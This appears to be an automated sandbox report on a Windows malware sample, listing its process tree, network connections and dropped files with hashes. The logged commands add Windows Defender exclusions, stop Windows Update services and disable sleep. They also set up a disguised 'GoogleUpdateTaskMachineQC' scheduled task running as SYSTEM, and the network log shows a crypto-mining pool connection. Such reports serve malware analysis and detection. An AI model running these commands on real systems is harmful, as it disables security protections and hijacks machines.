PID 3784 wrote to memory of 1116 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 756 wrote to memory of 2988 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 756 wrote to memory of 2988 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3484 wrote to memory of 692 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3484 wrote to memory of 692 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3784 wrote to memory of 1496 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe

"C:\Users\Admin\AppData\Local\Temp\2620-61-0x0000000003DC0000-0x0000000003DF4000-memory.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=19990 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1" --profile-directory="Default"

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffe06359758,0x7ffe06359768,0x7ffe06359778

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1676 --field-trial-handle=1456,i,3240205178489115400,914140057255821042,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1340 --field-trial-handle=1456,i,3240205178489115400,914140057255821042,131072 --disable-features=PaintHolding /prefetch:2

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=19990 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1984 --field-trial-handle=1456,i,3240205178489115400,914140057255821042,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=19990 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2264 --field-trial-handle=1456,i,3240205178489115400,914140057255821042,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=19990 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2500 --field-trial-handle=1456,i,3240205178489115400,914140057255821042,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=19990 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3128 --field-trial-handle=1456,i,3240205178489115400,914140057255821042,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=19990 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3172 --field-trial-handle=1456,i,3240205178489115400,914140057255821042,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=19990 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3432 --field-trial-handle=1456,i,3240205178489115400,914140057255821042,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataG71ZT" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataG71ZT\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataG71ZT" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffdf7bb46f8,0x7ffdf7bb4708,0x7ffdf7bb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=16045 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataG71ZT" --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1416,4627734676911030863,4551325689325878010,131072 --disable-features=PaintHolding --headless --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1424 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1416,4627734676911030863,4551325689325878010,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1856 /prefetch:3

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=16045 --allow-pre-commit-input --field-trial-handle=1416,4627734676911030863,4551325689325878010,131072 --disable-features=PaintHolding --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1968 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=16045 --allow-pre-commit-input --field-trial-handle=1416,4627734676911030863,4551325689325878010,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2188 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=16045 --allow-pre-commit-input --field-trial-handle=1416,4627734676911030863,4551325689325878010,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=16045 --allow-pre-commit-input --field-trial-handle=1416,4627734676911030863,4551325689325878010,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3076 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=16045 --allow-pre-commit-input --field-trial-handle=1416,4627734676911030863,4551325689325878010,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3248 /prefetch:1

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1416,4627734676911030863,4551325689325878010,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=audio --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=2316 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2f4 0x320

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 844 -ip 844

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 844 -s 276

Network

Country Destination Domain Proto
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
NL 136.244.98.226:33587 tcp
US 8.8.8.8:53 226.98.244.136.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 100.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 apis.google.com udp
US 8.8.8.8:53 ogs.google.com udp
NL 142.250.179.206:443 ogs.google.com tcp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.251.36.54:443 i.ytimg.com tcp
US 8.8.8.8:53 54.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
NL 142.250.179.141:443 accounts.google.com udp
NL 142.251.36.14:443 play.google.com udp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 194.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 apis.google.com udp
US 8.8.8.8:53 ogs.google.com udp
DE 172.217.23.206:443 apis.google.com tcp
NL 142.250.179.206:443 ogs.google.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 34.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.251.36.54:443 i.ytimg.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 209.197.3.8:80 tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
GB 216.58.208.98:443 googleads.g.doubleclick.net tcp
GB 216.58.208.98:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 98.208.58.216.in-addr.arpa udp
NL 142.251.36.54:443 i.ytimg.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 217.192.94.141.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

memory/2856-133-0x0000000074650000-0x0000000074E00000-memory.dmp

memory/2856-134-0x0000000000C90000-0x0000000000CC4000-memory.dmp

memory/2856-135-0x000000000B0F0000-0x000000000B708000-memory.dmp

memory/2856-136-0x000000000AC40000-0x000000000AD4A000-memory.dmp

memory/2856-137-0x000000000AB80000-0x000000000AB92000-memory.dmp

memory/2856-138-0x00000000015A0000-0x00000000015B0000-memory.dmp

memory/2856-139-0x000000000ABE0000-0x000000000AC1C000-memory.dmp

memory/2856-140-0x0000000074650000-0x0000000074E00000-memory.dmp

memory/2856-141-0x000000000AEF0000-0x000000000AF66000-memory.dmp

memory/2856-142-0x000000000B010000-0x000000000B0A2000-memory.dmp

memory/2856-143-0x000000000BCC0000-0x000000000C264000-memory.dmp

memory/2856-144-0x000000000B810000-0x000000000B876000-memory.dmp

memory/2856-145-0x000000000BC40000-0x000000000BC90000-memory.dmp

memory/2856-146-0x00000000015A0000-0x00000000015B0000-memory.dmp

memory/2856-147-0x000000000C600000-0x000000000C7C2000-memory.dmp

memory/2856-148-0x000000000D610000-0x000000000DB3C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/4516-169-0x00007FF78B450000-0x00007FF78C676000-memory.dmp

memory/4516-171-0x00007FFE14C50000-0x00007FFE14E45000-memory.dmp

memory/4516-170-0x00007FF78B450000-0x00007FF78C676000-memory.dmp

memory/4516-172-0x00007FF78B450000-0x00007FF78C676000-memory.dmp

memory/4516-173-0x00007FF78B450000-0x00007FF78C676000-memory.dmp

memory/4516-174-0x00007FF78B450000-0x00007FF78C676000-memory.dmp

memory/4516-175-0x00007FF78B450000-0x00007FF78C676000-memory.dmp

memory/4516-176-0x00007FF78B450000-0x00007FF78C676000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

